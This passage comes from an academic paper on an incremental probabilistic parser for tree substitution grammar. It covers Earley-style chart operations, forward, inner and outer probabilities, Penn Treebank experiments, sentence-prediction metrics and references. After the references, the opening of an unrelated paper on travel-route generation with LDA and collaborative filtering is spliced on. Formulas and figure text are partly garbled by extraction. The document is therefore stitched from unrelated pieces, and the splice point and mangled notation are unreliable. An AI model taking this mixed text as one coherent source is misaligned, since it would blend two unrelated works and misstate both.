left open, i.e., which fragment is being introduced at a specific stage of a derivation, and when the generative process ter- minates. A symbolic ITSG can be equipped with a probabilistic component which deals with these choices. A proper probability model for ITSG needs to define three probability distributions over the three types of fragments in the grammar, such that: ∑ finit∈Finit P( finit) = 1 (1) ∑ f Xlex∈F X lex P( f Xlex) = 1 (∀X ∈ N ) (2) P(�Y )+ ∑ f Ysub∈F Y sub P( f Ysub) = 1 (∀Y ∈ N ) (3) The probability that an ITSG generates a specific derivation d is obtained by multiplying the probabil- ities of the fragments taking part in the derivation: P(d) = ∏ f∈d P( f ) (4) Since the grammar may generate a tree t via multiple derivations D(t) = d1,d2,...,dm, the probability of the parse tree is the sum of the probabilities of the ITSG derivations in D(t): P(t) = ∑ d∈D(t) P(d) = ∑ d∈D(t) ∏ f∈d P( f ) (5) 3 Probabilistic ITSG Parser We introduce a probabilistic chart-parsing algorithm to efficiently compute all possible incremental de- rivations that an ITSG can generate given an input sentence (presented one word at the time). The pars- ing algorithm is an adaptation of the Earley algo- rithm (Earley, 1970) and its probabilistic instantia- tion (Stolcke, 1995). 3.1 Parsing Chart A TSG incremental derivation is represented in the chart as a sequence of chart states, i.e., a path. For a given fringe in an incremental derivation, there will be one or more states in the chart, depend- ing on the length of the fringe’s yield. This is be- cause we need to keep track of the extent to which the yield of each fringe has been consumed within a derivation as the sentence is processed incremen- tally.5 At the given stage of the derivation, the states offer a compact representation over the partial struc- tures generated so far. 5A fringe (state) may occur in multiple derivations (paths): for instance in Figure 4 the two derivations will correspond to two separate paths that will converge to the same fringe (state). 5 Start(`0) X �`0ν 0 : 0X �•`0ν [α,γ,β] α = γ = P(X �`0ν) β = β(1 : 0X �`0 •ν) Backward Substitution(`i) i : kX � λ•Y µ [α,γ,β] Y �`iν i : iY �•`iν [α′,γ′,β′] α ′ += α ·P(Y �`iν) γ ′ = P(Y �`iν) Forward Substitution(`i) i : 0Y � ν• [α,γ,β] X �Y `iµ i : 0X �Y •`iµ [α′,γ′,β′] α ′ += α ·P(X �Y `iµ) γ ′ += γ ·P(X �Y `iµ) β + = β′ ·P(X �Y `iµ) Completion i : jY �` jν• [α,γ,β] j : kX � λ•Y µ [α′,γ′,β′] i : kX � λY •µ [α′′,γ′′,β′′] α ′′ += α′ ·γ γ ′′ += γ′ ·γ β + = β′′ ·γ′ β ′ += β′′ ·γ′′ Scan(`i) i : kX � λ•`iµ [α,γ,β] i + 1 : kX � λ`i •µ [α′,γ′,β′] α ′ = α γ ′ = γ β = β′ Stop(#) n : 0Y � ν• [α = γ,β] Ø �Y # n : 0Ø �Y •# [α′,γ′,β′] α ′ = γ′ = α ·P(�Y ) β ′ = 1 β = P(�Y ) Figure 6: Chart operations with forward (α), inner (γ), and outer (β) probabilities. Each state is composed of a fringe and some ad- ditional information which keeps track of where the fringe is located within a path. A chart state can be generally represented as i : kX � λ•µ (6) where X � λµ is the state’s fringe, Greek letters are (possibly empty) sequences of words and substitu- tion sites, and • is a placeholder indicating to which extent the fragment’s yield has been consumed: all the elements in the yield preceding the dot have been already accepted. Finally, i and k are indices of words in the input sentence: • i signifies that the current state is introduced after the first i words in the sentence have been scanned. All states in the chart will be grouped according to this index, and will con- stitute state-set i. • k indicates that the fringe associated with the current state was first introduced in the chart after the first k words in the input sentence had been scanned. The index k is therefore called the start index. For instance when generating the first incremental derivation in Figure 4, the parser will pass through state 1 : 1S � NP • “were” VP “.” indicating that the second fringe is introduced right after the parser has scanned the first word in the sentence and before having scanned the second word. 3.2 Parsing Algorithm We will first introduce the symbolic part of the parsing algorithm, and then discuss its probabilistic component in Section 3.3. In line with the generative process illustrated in Section 2.2, the parser operates on the chart states in order to keep track of all pos- sible ITSG derivations as new words are fed in. It starts by reading the first word `0 and introducing new states to state-set 0 in the chart, those mapping to initial fragments in the grammar with `0 as lexi- cal anchor. At a given stage, after i words have been scanned, the parser reads the next word (`i) and in- troduces new states in state-sets i and i + 1 by apply- ing specific operations on states present in the chart, and fringes in the grammar. Parser Operations The parser begins with the start operation just described, and continues with a cycle of four operations for every word in the input sentence `i (for i ≥ 0). The order of the four opera- tions is the following: completion, backward substi- tution (4), forward substitution (5), and scan. When there are no more words in input, the parser termi- nates with a stop operation. We will now describe the parser operations (see Figure 6 for their formal definition), ignoring the probabilities for now. Start(`0): For every initial fringe in the grammar anchored in `0, the parser inserts a (scan) state for that fringe in the state-set 0. 6 Backward Substitution(`i) applies to acceptor states, i.e., those with a substitution site following the dot, say X . For each acceptor state in state-set i, and any lex-first fringe in the grammar rooted in X and anchored in `i, the parser inserts a (scan) state for that fringe in state-set i. Forward Substitution(`i) applies to donor states, i.e., those that have no elements following the dot and with start index 0. For each donor state in state-set i, rooted in Y , and any sub-first fringe in the grammar with Y as the left-most element in its yield, the parser inserts a (scan) state for that fringe in state-set i, with the dot placed after Y . Completion applies to complete states, i.e., those with no elements following the dot and with start index j > 0. For every complete state in state-set i, rooted in Y , with starting index j, and every acceptor state in set j with Y following the dot, the parser inserts a copy of the acceptor state in state-set i, and advances the dot. Scan(`i) applies to scan states, i.e., those with a word after the dot. For every scan state in state-set i having `i after the dot, the parser inserts a copy of that state in state-set (i + 1), and advances the dot. Stop(#) is a special type of forward substitution and applies to donor states, but only when the input word is the terminal symbol #. For every donor state in state-set n (the length of the sentence), if the root of the fringe’s state is Y , the parser introduces a stop state whose fringe is a stop fringe with Y as the left most substitution site. Comparison with the Earley Algorithm It is useful to clarify the differences between the pro- posed ITSG parsing algorithm and the original Ear- ley algorithm. Primarily, the ITSG parser is based on a left-right processing order, whereas the Ear- ley algorithm uses a top-down generative process. Moreover, our parser presupposes a restricted in- ventory of fragments in the grammar (the ones al- lowed by an ITSG) as opposed to the general CFG rules allowed by the Earley algorithm. In particular, the Backward Substitution operation is more limited than the corresponding Prediction step of the Earley algorithm: only lex-first fragments can be introduced using Backward Substitution, and therefore left re- cursion (allowed by the Earley algorithm) is not pos- sible here.6 This restriction is compensated for by the existence of the Forward Substitution operation, which has no analog in the Earley algorithm.7 The worst case complexity of Earley algorithm is domi- nated by the Completion operation which is identical to that in our parser, and therefore the original total time complexity applies, i.e., O(l3) for an input sen- tence of length l, and O(n3) in terms of the number of non-lexical nodes n in the grammar. Derivations Incremental (partial) derivations are represented in the chart as (partial) paths along states. Each state can lead to one or more succes- sors, and come from one or more antecedents. Scan is the only operation which introduces, for every scan state, a new single successor state (which can be of any of the four types) in the following state- set. Complete states may lead to several states within the current state-set, which may belong to any of the four types. An acceptor state may lead to a number of scan states via backward substitution (depending on the number of lex-first fringes that can combine with it). Similarly, a donor state may lead to a num- ber of scan states via forward substitution. After i words have been scanned, we can retrieve (partial) paths from the chart. This is done in a back- ward direction starting from scan states in state-set i all the way back to the initial states. This is possible since all the operations are reversible, i.e., given a state it is possible to retrieve its antecedent state(s). As an example, consider the ITSG grammar con- sisting of the fragments in Figure 7 and the two de- rivations of the same parse tree in the same figure; Figure 7 represents the parsing chart of the same grammar, containing the two corresponding paths. 3.3 Probabilistic Parser In the probabilistic version of the parser, each fringe in the grammar has a given probability, such that Equations (1)–(3) are satisfied.8 In the probabilistic chart, every state i : kX �λ•µ is decorated with three 6This further simplifies the probabilistic version of our parser, as there is no need to resort to the probabilistic reflex- ive, transitive left-corner relation described by Stolcke (1995). 7This operation would violate Earley’s top-down constraint; donor states are in fact the terminal states in Earley algorithm. 8The probability of an ambiguous fringe is the marginal probability of the fragments mapping to it. 7 0 – “Terms” S | 0NP �• “Terms” [1/2, 1/2, 1] || 0S �• “Terms” S@ [1/2, 1/2, 1] 1 – “were” S | 0S � NP • “were” V P “.” [1/2, 1/2, 1] || 1S@ �• “were” V P “.” [1/2, 1, 1/2] 4 || 0S � “Terms” • S@ [1/2, 1/2, 1] ∗ || S@ � “were” V P “.” [1] 5 | 0NP � “Terms” • [1/2, 1/2, 1] | S � NP “were” V P “.” [1] 2 – “disclosed” S 2V P �• “disclosed” [1, 1, 1] 4 | 0S � NP “were” • V P “.” [1/2, 1/2, 1] ∗∗ || 1S@ � “were” • V P “.” [1/2, 1, 1/2] ∗∗∗ V P � “disclosed” [1] 3 – “.” S | 0S � NP “were” V P • “.” [1/2, 1/2, 1] || 1S@ � “were” V P • “.” [1/2, 1, 1/2] C 2V P � “disclosed” • [1, 1, 1] | ** || *** 4 – # S 0∅� S • # [1, 1, 1] � || 0S � “Terms” S@ • [1/2, 1/2, 1] | 0S � NP “were” V P “.” • [1/2, 1/2, 1] ∅� S # [1] C || 1S@ � “were” V P “.” • [1/2, 1, 1/2] || * Figure 7: The parsing chart of the two derivations in Figure 4. Blue states or fringes (also marked with |) are the ones in the first derivation, red (||) in the second, and yellow (no marks) are the ones in common. Each state-set is represented as a separate block in the chart, headed by the state-set index and the next word. Each row maps to a chart operation (specified in the first column, with S and C standing for ‘scan’ and ‘complete’ respectively) and follows the same notation of figure 6. Symbols ∗ are used as state placeholders. probabilities [α,γ,β] as shown in the chart example in Figure 7. • The forward probability α is the marginal prob- ability of all the paths starting with an initial state, scanning all initial words in the sentence until `i−1 included, and passing through the current state. • The inner probability γ is the marginal proba- bility of all the paths passing through the state k : kX �•λµ, scanning words `k,...,`i−1 and passing through the current state. • The outer probability β is the marginal prob- ability of all the paths starting with an initial state, scanning all initial words in the sentence until `k−1 included, passing through the current state, and reaching a stop state. Forward (α) and inner (γ) probabilities are propa- gated while filling the chart incrementally, whereas outer probabilities (β) are back-propagated from the stop states, for which β = 1 (see Figure 6). These probabilities are used for computing prefix and sen- tence probabilities, and for obtaining the most prob- able partial derivation (MPD) of a prefix, the MPD of a sentence, its minimum risk parse (MRP), and to approximate its most probable parse (MPP). Prefix probabilities are obtained by summing over the forward probabilities of all scan states in state-set i having `i after the dot:9 P(`0,...,`i) = ∑ state s i:k X�λ•`iµ α(s) (7) 3.4 Most Probable Derivation (MPD) The Most Probable (partial) Derivation (MPD) can be obtained from the chart by backtracking the Viterbi path. Viterbi forward and inner probabilities 9Sentence probability is obtained by marginalizing the for- ward probabilities of the stop states in the last state-set n. 8 (α∗,γ∗) are propagated as standard forward and in- ner probabilities except that summation is replaced by maximization, and the probability of an ambigu- ous fringe is the maximum probability among all the fragments mapping into it (instead of the marginal one). The Viterbi partial path for the prefix `0,...,`i can then be retrieved by backtracking from the scan state in state-set i with max α∗: for each state, the most probable preceding state is retrieved, i.e., the state among its antecedents with maximum α∗. The Viterbi complete path of a sentence can be obtained by backtracking the Viterbi path from the stop state with max α∗. Given a Viterbi path, it is possible to obtain the corresponding MPD. This is done by re- trieving the associated sequence of fragments10 and connecting them. 3.5 Most Probable Parse (MPP) According to Equation (5), if we want to compute the MPP we need to retrieve all possible derivations of the current sentence, sum up the probabilities of those generating the same tree, and returning the tree with max marginal probability. Unfortunately the number of possible derivations grows exponen- tially with the length of the sentence, and computing the exact MPP is NP-hard (Sima’an, 1996). In our implementation, we approximate the MPP by per- forming this marginalization over the Viterbi-best derivations obtained from all stop states in the chart. 3.6 Minimum Risk Parse (MRP) MPD and MPP aim at obtaining the structure of a sentence which is more likely as a whole under the current probabilistic model. Alternatively, we may want to focus on the single components of a tree structures, e.g., CFG rules covering a certain span of the sentence, and search for the structure which has the highest number of correct constituents, as pro- posed by Goodman (1996). Such structure is more likely to obtain higher results according to standard parsing evaluations, as the objective being maxi- mized is closely related to the metric used for eval- uation (recall/precision on the number of correct la- beled constituents). 10For each scan state in the path, we obtain the fragment in the grammar that maps into the state’s fringe. For ambiguous fringes the most probable fragment that maps into it is selected. In order to obtain the minimum risk parse (MRP) we utilize both inner (γ) and outer (β) probabilities. The product of these two probabilities equals the marginal probability of all paths generating the en- tire current sentence and passing through the current state. We can therefore compute the probability of a fringe f = X � λ•µ covering a specific span [s,t] of the sentence: P( f ,[s,t]) = γ(t : s f•)·β(t : s f•) (8) We can then compute the probability of each frag- ment spanning [s,t],11 and the probability P(r,[s,t]) of a CFG-rule r spanning [s,t].12 Finally the MRP is computed as MRP = arg max T ∏ r∈T P(r,[s,t]) (9) 4 Experiments For training and evaluating the ITSG parser, we em- ploy the Penn WSJ Treebank (Marcus et al., 1993). We use sections 2–21 for training, section 22 and 24 for development and section 23 for testing. 4.1 Grammar Extraction Following standard practice, we start with some pre- processing of the treebank. After removing traces and functional tags, we apply right binarization on the training treebank (Klein and Manning, 2003), with no horizontal and vertical conditioning. This means that when a node X has more than two chil- dren, new artificial constituents labeled X @ are cre- ated in a right recursive fashion (see Figure 1).13 We then replace words appearing less than five times in the training data by one of 50 unknown word cate- gories based on the presence of lexical features as described in Petrov (2009). Fragment Extraction In order to equip the gram- mar with a representative set of lexicalized frag- ments, we use the extraction algorithm of Sangati 11For an ambiguous fringe, the spanning probability of each fragment mapping into it is the fraction of the fringe’s spanning probability with respect to the marginal fringe probability. 12Marginalizing the probabilities of all fragments having r spanning [s,t]. 13This shallow binarization (H0V1) was used based on gold coverage of the unsmoothed grammar (extracted from the train- ing set) on trees in section 22: H0V1 binarization results on a coverage of 88.0% of the trees, compared to 79.2% for H1V1. 9 et al. (2010) which finds maximal fragments recur- ring twice or more in the training treebank. To en- sure better coverage, we additionally extract one- word fragments from each training parse tree: for each lexical node ` in the parse tree we percolate up till the root node, and for every encountered in- ternal node X0,X1,...,Xi we extract the lexicalized fragment whose spine is Xi − Xi−1 − ...− X0 −`, and where all the remaining children of the inter- nal nodes are substitution sites (see for instance the right fragment in Figure 1). Finally, we remove all fragments which do not comply with the restrictions presented in Section 2.1.14 For each extracted fragment we keep track of its frequency, i.e., the number of times it occurs in the training corpus. Each fragment’s probability is then derived according to its relative frequency in the corresponding set of fragments ( finit, f Xlex, f Y sub), so that equations(1)–(3) are satisfied. The final gram- mar consists of 2.2M fragments mapping to 2.0M fringes. Smoothing Two types of smoothing are per- formed over the grammar’s fragments: Open class smoothing adds simple CFG rewriting rules to the grammar for open-class15 〈PoS,word〉 pairs not en- countered in the training corpus, with frequency 10−6. Initial fragments smoothing adds each lex-first fragment f to the initial fragment set with frequency 10−2 ·freq( f ).16 All ITSG experiments we report used exhaustive search (no beam was used to prune the search space). 4.2 Evaluation In addition to standard full-sentence parsing results, we propose a novel way of evaluating our ITSG on partial trees, i.e., those that the parser constructs for sentence prefixes. More precisely, for each prefix of the input sentence (length two words or longer) we compute the parsing accuracy on the minimal struc- ture spanning that prefix. The minimal structure is obtained from the subtree rooted in the minimum 14The fragment with no lexical items, and those with more than one substitution site at the beginning of the yield. 15A PoS belongs to the open class if it rewrites to at least 50 different words in the training corpus. A word belongs to the open class if it has been seen only with open-class PoS tags. 16The parameters were tuned on section 24 of the WSJ. common ancestor of the prefix nodes, after pruning those nodes not yielding any word in the prefix. As observed in the example derivations of Fig- ure 4, our ITSG generates partial trees for a given prefix which may include predictions about unseen parts of the sentence. We propose three new mea- sures for evaluating sentence prediction:17 Word prediction PRD(m): For every prefix of each test sentence, if the model predicts m′ ≥ m words, the prediction is correct if the first m pre- dicted words are identical to the m words following the prefix in the original sentence. Word presence PRS(m): For every prefix of each test sentence, if the model predicts m′ ≥ m words, the prediction is correct if the first m predicted words are present, in the same order, in the words following the prefix in the original sentence (i.e., the predicted word sequence is a subsequence of the sequence of words following the prefix).18 Longest common subsequence LCS: For every prefix of each test sentence, it computes the longest common subsequence between the sequence of pre- dicted words (possibly none) and the words follow- ing the prefix in the original sentence. Recall and precision can be computed in the usual way for these three measures. Recall is the total number (over all prefixes) of correctly predicted words (as defined by PRD(m), PRS(m), or LCS) over the total number of words expected to be pre- dicted (according to m), while precision is the num- ber of correctly predicted words over the number of words predicted by the model. We compare the ITSG parser with the incremental parsers of Schuler et al. (2010) and Demberg et al. (2014) for full-sentence parsing, with the Roark (2001) parser19 for full-sentence and partial pars- 17We also evaluated our ITSG model using perplexity; the results obtained were substantially worse than those obtained using Roark’s parsers. 18Note that neither PRD(m) nor PRS(m) correspond to word error rate (WER). PRD requires the predicted word sequence to be identical to the original sequence, while PRS only requires the predicted words to be present in the original. In contrast, WER measures the minimum number of substitutions, inser- tions, and deletions needed to transform the predicted sequence into the original sequence. 19Apart from reporting the results in Roark (2001), we also run the latest version of Roark’s parser, used in Roark et al. (2009), which has higher results compared to the original work. 10 R P F1 Demberg et al. (2014) 79.4 79.4 79.4 Schuler et al. (2010) 83.4 83.7 83.5 Roark (2001) 86.6 86.5 86.5 Roark et al. (2009) 87.7 87.5 87.6 ITSG (MPD) 81.5 83.5 82.5 ITSG (MPP) 81.6 83.6 82.6 ITSG (MRP) 82.6 85.8 84.1 ITSG Smoothing (MPD) 83.0 83.5 83.2 ITSG Smoothing (MPP) 83.2 83.6 83.4 ITSG Smoothing (MRP) 83.9 85.6 84.8 Table 1: Full-sentence parsing results for sentences in the test set of length up to 40 words. ing, and with a language model built using SRILM (Stolcke, 2002) for sentence prediction. We used a standard 3-gram model trained on the sentences of the training set using the default setting and smooth- ing (Kneser-Ney) provided by the SRILM pack- age. (Higher n-gram model do not seem appropriate, given the small size of the training corpus.) For ev- ery prefix in the test set we compute the most prob- able continuation predicted by the n-gram model.20 4.3 Results Table 1 reports full-sentence parsing results for our parser and three comparable incremental parsers from the literature. While Roark (2001) obtains the best results, the ITSG parser without smoothing per- forms on a par with Schuler et al. (2010), and out- performs Demberg et al. (2014).21 Adding smooth- ing results in a gain of 1.2 points F-score over the Schuler parser. When we compare the different pars- ing objectives of the ITSG parser, MRP is the best one, followed by MPP and MPD. Incremental Parsing The graphs in Figure 8 com- pare the ITSG and Roark’s parser on the incremental parsing evaluation, when parsing sentences of length 10, 20, 30 and 40. The performance of both models declines as the length of the prefix increases, with Roark’s parser outperforming the ITSG parser on average, although the ITSG parser seems more com- 20We used a modified version of a script by Nathaniel Smith available at https://github.com/njsmith/pysrilm. 21Note that the scores reported by Demberg et al. (2014) are for TAG structures, not for the original Penn Treebank trees. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 Prefix Length 86 88 90 92 94 96 F- sc or e Roark (last) ITSG Smooth. (MPD) Roark et al. (2009) 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 Prefix Length 86 88 90 92 94 96 F- sc or e Roark (last) ITSG Smooth. (MPD)ITSG Smooth. (MPD) F -s co re 2 3 4 5 6 7 8 9 1091 92 93 94 95 96 97 98 99 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 85 86 87 88 89 90 91 92 93 94 95 96 97 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 78 80 82 84 86 88 90 92 94 96 98 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 34 36 38 40 78 80 82 84 86 88 90 92 94 96 98 Prefix Length Figure 8: Partial parsing results for sentences of length 10, 20, 30, and 40 (from upper left to lower right). petitive when parsing prefixes for longer (and there- fore more difficult) sentences. Sentence Prediction Table 2 compares the sen- tence prediction results of the ITSG and the lan- guage model (SRILM). The latter is outperforming the former when predicting the next word of a pre- fix, i.e. PRD(1), whereas ITSG is better than the lan- guage model at predicting a single future word, i.e. PRS(1). When more than one (consecutive) word is considered, the SRILM model exhibits a slightly better recall while ITSG achieves a large gain in pre- cision. This illustrates the complementary nature of the two models: while the language model is better at predicting the next word, the ITSG predicts future words (rarely adjacent to the prefix) with high con- fidence (89.4% LCS precision). However, it makes predictions for only a small number of words (5.9% LCS recall). Examples of sentence predictions can be found in Table 3. 5 Related Work To the best of our knowledge, there are no other in- cremental TSG parsers in the literature. The parser of Demberg et al. (2014) is closely related, but uses tree-adjoining grammar, which includes both sub- stitution and adjunction. That parser makes predic- tions, but only for upcoming structure, not for up- coming words, and thus cannot be used directly for sentence prediction. The incremental parser of Roark (2001) uses a top-down algorithm and works 11 ITSG SRILM Correct R P Correct R P PRD(1) 4,637 8.7 12.5 11,430 21.5 21.6 PRD(2) 864 1.7 13.9 2,686 5.3 5.7 PRD(3) 414 0.9 20.9 911 1.9 2.1 PRD(4) 236 0.5 23.4 387 0.8 1.0 PRS(1) 34,831 65.4 93.9 21,954 41.2 41.5 PRS(2) 4,062 8.0 65.3 5,726 11.3 12.2 PRS(3) 1,066 2.2 53.7 1,636 3.4 3.8 PRS(4) 541 1.2 53.7 654 1.4 1.7 LCS 44,454 5.9 89.4 92,587 12.2 18.4 Table 2: Sentence prediction results. Prefix Shares of UAL , the parent PRD(3) PRS(3) ITSG company of United Airlines , − − SRILM company , which is the − − Goldstd of United Airlines , were extremely active all day Friday . Prefix PSE said it expects to report earnings of $ 1.3 million to $ 1.7 million , or 14 ITSG cents a share , − + SRILM % to $ UNK − − Goldstd cents to 18 cents a share . Table 3: Examples comparing sentence predictions for ITSG and SRILM (UNK: unknown word). on the basis of context-free rules. These are aug- mented with a large number of non-local fea- tures (e.g., grandparent categories). Our approach avoids the need for such additional features, as TSG fragments naturally contain non-local informa- tion. Roark’s parser outperforms ours in both full- sentence and incremental F-score (see Section 4), but cannot be used for sentence prediction straight- forwardly: to obtain a prediction for the next word, we would need to compute an argmax over the whole vocabulary, then iterate this for each word af- ter that (the same is true for the parsers of Schuler et al., 2010 and Demberg et al., 2014). Most in- cremental dependency parsers use a discriminative model over parse actions (Nivre, 2007), and there- fore cannot predict upcoming words either (but see Huang and Sagae 2010). Turning to the literature on sentence prediction, we note that ours is the first attempt to use a parser for this task. Existing approaches either use n-gram models (Eng and Eisner, 2004; Bickel et al., 2005) or a retrieval approach in which the best matching sen- tence is identified from a sentence collection given a set of features (Grabski and Scheffer, 2004). There is also work combining n-gram models with lexical semantics (Li and Hirst, 2005) or part-of-speech in- formation (Fazly and Hirst, 2003). In the language modeling literature, more sophis- ticated models than simple n-gram models have been developed in the past few years, and these could potentially improve sentence prediction. Ex- amples include syntactic language models which have applied successfully for speech recognition (Chelba and Jelinek, 2000; Xu et al., 2002) and ma- chine translation (Schwartz et al., 2011; Tan et al., 2011), as well as discriminative language models (Mikolov et al., 2010; Roark et al., 2007). Future work should evaluate these approaches against the ITSG model proposed here. 6 Conclusions We have presented the first incremental parser for tree substitution grammar. Incrementality is moti- vated by psycholinguistic findings, and by the need for real-time interpretation in NLP. We have shown that our parser performs competitively on both full sentence and sentence prefix F-score. We also intro- duced sentence prediction as a new way of evaluat- ing incremental parsers, and demonstrated that our parser outperforms an n-gram model in predicting more than one upcoming word. The performance of our approach is likely to im- prove by implementing better binarization and more advanced smoothing. Also, our model currently con- tains no conditioning on lexical information, which is also likely to yield a performance gain. Finally, future work could involve replacing the relative fre- quency estimator that we use with more sophisti- cated estimation schemes. Acknowledgments This work was funded by EPSRC grant EP/I032916/1 “An integrated model of syntac- tic and semantic prediction in human language processing”. We are grateful to Brian Roark for clarifying correspondence and for guidance in using his incremental parser. We would also like to thank Katja Abramova, Vera Demberg, Mirella Lapata, Andreas van Cranenburgh, and three anonymous reviewers for useful comments. 12 References Alfred V. Aho and Jeffrey D. Ullman. 1972. The theory of parsing, translation, and compiling. Prentice-Hall, Inc., Upper Saddle River, NJ. Gerry T. M. Altmann and Yuki Kamide. 1999. Incre- mental interpretation at verbs: Restricting the do- main of subsequent reference. Cognition, 73:247– 264. Steffen Bickel, Peter Haider, and Tobias Scheffer. 2005. Predicting sentences using n-gram lan- guage models. In Proceedings of the Conference on Human Language Technology and Empirical Methods in Natural Language Processing, pages 193–200. Vancouver. Rens Bod. 1995. The problem of computing the most probable tree in data-oriented parsing and stochastic tree grammars. In Proceedings of the 7th Conference of the European Chapter of the Association for Computational Linguistics, pages 104–111. Association for Computer Linguistics, Dublin. Rens Bod, Khalil Sima’an, and Remko Scha. 2003. Data-Oriented Parsing. University of Chicago Press, Chicago, IL. Ciprian Chelba and Frederick Jelinek. 2000. Struc- tured language modeling. Computer Speech and Language, 14:283–332. Vera Demberg and Frank Keller. 2008. Data from eye-tracking corpora as evidence for theories of syntactic processing complexity. Cognition, 101(2):193–210. Vera Demberg, Frank Keller, and Alexander Koller. 2014. Parsing with psycholinguistically moti- vated tree-adjoining grammar. Computational Linguistics, 40(1). In press. Jay Earley. 1970. An efficient context-free pars- ing algorithm. Communications of the ACM, 13(2):94–102. John Eng and Jason M. Eisner. 2004. Radiology report entry with automatic phrase completion driven by language modeling. Radiographics, 24(5):1493–1501. Afsaneh Fazly and Graeme Hirst. 2003. Testing the efficacy of part-of-speech information in word completion. In Proceedings of the EACL Work- shop on Language Modeling for Text Entry Meth- ods, pages 9–16. Budapest. Joshua Goodman. 1996. Parsing algorithms and metrics. In Proceedings of the 34th Annual Meet- ing on Association for Computational Linguistics, pages 177–183. Association for Computational Linguistics, Santa Cruz. Korinna Grabski and Tobias Scheffer. 2004. Sen- tence completion. In Proceedings of the 27th An- nual International ACM SIR Conference on Re- search and Development in Information Retrieval, pages 433–439. Sheffield. Liang Huang and Kenji Sagae. 2010. Dynamic pro- gramming for linear-time incremental parsing. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 1077–1086. Association for Computational Lin- guistics, Uppsala. Dan Klein and Christopher D. Manning. 2003. Ac- curate unlexicalized parsing. In Proceedings of the 41st Annual Meeting on Association for Com- putational Linguistics, pages 423–430. Associa- tion for Computational Linguistics, Sapporo. Jianhua Li and Graeme Hirst. 2005. Semantic knowledge in a word completion task. In Pro- ceedings of the 7th International ACM SIGAC- CESS Conference on Computers and Accessibil- ity, pages 121–128. Baltimore. Mitchell P. Marcus, Mary Ann Marcinkiewicz, and Beatrice Santorini. 1993. Building a large anno- tated corpus of english: The penn treebank. Com- putational Linguistics, 19(2):313–330. Tomas Mikolov, Martin Karafiat, Jan Cernocky, and Sanjeev. 2010. Recurrent neural network based language model. In Proceedings of the 11th Annual Conference of the International Speech Communication Association, pages 2877–2880. Florence. Joakim Nivre. 2007. Incremental non-projective dependency parsing. In Proceedings of Human Language Technologies: The Annual Conference of the North American Chapter of the Associa- tion for Computational Linguistics, pages 396– 403. Association for Computational Linguistics, Rochester. 13 Slav Petrov. 2009. Coarse-to-Fine Natural Lan- guage Processing. Ph.D. thesis, University of California at Bekeley, Berkeley, CA. Brian Roark. 2001. Probabilistic top-down parsing and language modeling. Computational Linguis- tistics, 27:249–276. Brian Roark, Asaf Bachrach, Carlos Cardenas, and Christophe Pallier. 2009. Deriving lexical and syntactic expectation-based measures for psy- cholinguistic modeling via incremental top-down parsing. In Proceedings of the Conference on Em- pirical Methods in Natural Language Processing, pages 324–333. Association for Computational Linguistics, Singapore. Brian Roark, Murat Saraclar, and Michael Collins. 2007. Discriminative n-gram language modeling. Computer Speech and Language, 21(2):373–392. D. J. Rosenkrantz and P. M. Lewis. 1970. Deter- ministic left corner parsing. In Proceedings of the 11th Annual Symposium on Switching and Au- tomata Theory, pages 139–152. IEEE Computer Society, Washington, DC. Federico Sangati, Willem Zuidema, and Rens Bod. 2010. Efficiently extract recurring tree fragments from large treebanks. In Nicoletta Calzolari, Khalid Choukri, Bente Maegaard, Joseph Mar- iani, Jan Odijk, Stelios Piperidis, Mike Rosner, and Daniel Tapias, editors, Proceedings of the 7th InternationalConference on Language Resources and Evaluation. European Language Resources Association, Valletta, Malta. Yves Schabes. 1990. Mathematical and Computa- tional Aspects of Lexicalized Grammars. Ph.D. thesis, University of Pennsylvania, Philadelphia, PA. William Schuler, Samir AbdelRahman, Tim Miller, and Lane Schwartz. 2010. Broad-coverage pars- ing using human-like memory constraints. Com- putational Linguististics, 36(1):1–30. Lane Schwartz, Chris Callison-Burch, William Schuler, and Stephen Wu. 2011. Incremental syn- tactic language models for phrase-based transla- tion. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies, Volume 1, pages 620–631. Association for Computational Linguis- tics, Portland, OR. Khalil Sima’an. 1996. Computational complexity of probabilistic disambiguation by means of tree- grammars. In Proceedings of the 16th Confer- ence on Computational Linguistics, pages 1175– 1180. Association for Computational Linguistics, Copenhagen. Andreas Stolcke. 1995. An efficient probabilis- tic context-free parsing algorithm that computes prefix probabilities. Computational Linguistics, 21(2):165–201. Andreas Stolcke. 2002. SRILM – an extensible lan- guage modeling toolkit. In Proceedings Interna- tional Conference on Spoken Language Process- ing, pages 257–286. Denver, CO. Scott C. Stoness, Joel Tetreault, and James Allen. 2004. Incremental parsing with reference inter- action. In Frank Keller, Stephen Clark, Matthew Crocker, and Mark Steedman, editors, Proceed- ings of the ACL Workshop Incremental Parsing: Bringing Engineering and Cognition Together, pages 18–25. Association for Computational Lin- guistics, Barcelona. Ming Tan, Wenli Zhou, Lei Zheng, and Shaojun Wang. 2011. A large scale distributed syntac- tic, semantic and lexical language model for ma- chine translation. In Proceedings of the 49th Annual Meeting of the Association for Compu- tational Linguistics: Human Language Technolo- gies, Volume 1, pages 201–210. Association for Computational Linguistics, Portland, OR. Michael K. Tanenhaus, Michael J. Spivey- Knowlton, Kathleen M. Eberhard, and Julie C. Sedivy. 1995. Integration of visual and linguistic information in spoken language comprehension. Science, 268:1632–1634. Peng Xu, Ciprian Chelba, and Frederick Jelinek. 2002. A study on richer syntactic dependencies for structured language modeling. In Proceedings of the 40th Annual Meeting on Association for Computational Linguistics, pages 191–198. As- sociation for Computational Linguistics, Philadel- phia. 14 work_pwcpe4ln3jeu7bcvge6twr4gru ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 47 Traveling Route Generation Algorithm Based On LDA and Collaborative Filtering Peng Cui, Yuming Wang and Chunmei Li* Department of Computer Technology and Applications Qinghai University Xining, China, 810016 e-mail: li_chm0422@sina.com Abstract—With the rapid development of China’s economy and the increase in tourism consumption, the number of people in traveling in domestic tourism has increased rapidly each year, and more travelers choose privately customized travel routes, so reasonable travel route is generated based on the actual users’ needs has become a hot research spot in the current industry and academia. However, as far as practical application is concerned, the planning of travel routes is a comprehensive and complex task. Reasonable travel routes include comprehensive features such as reasonable travel cities, travel time, transportation methods, and itinerary arrangements. At present, the traditional method is basically that the customer manager can manually plan the suitable travel route for 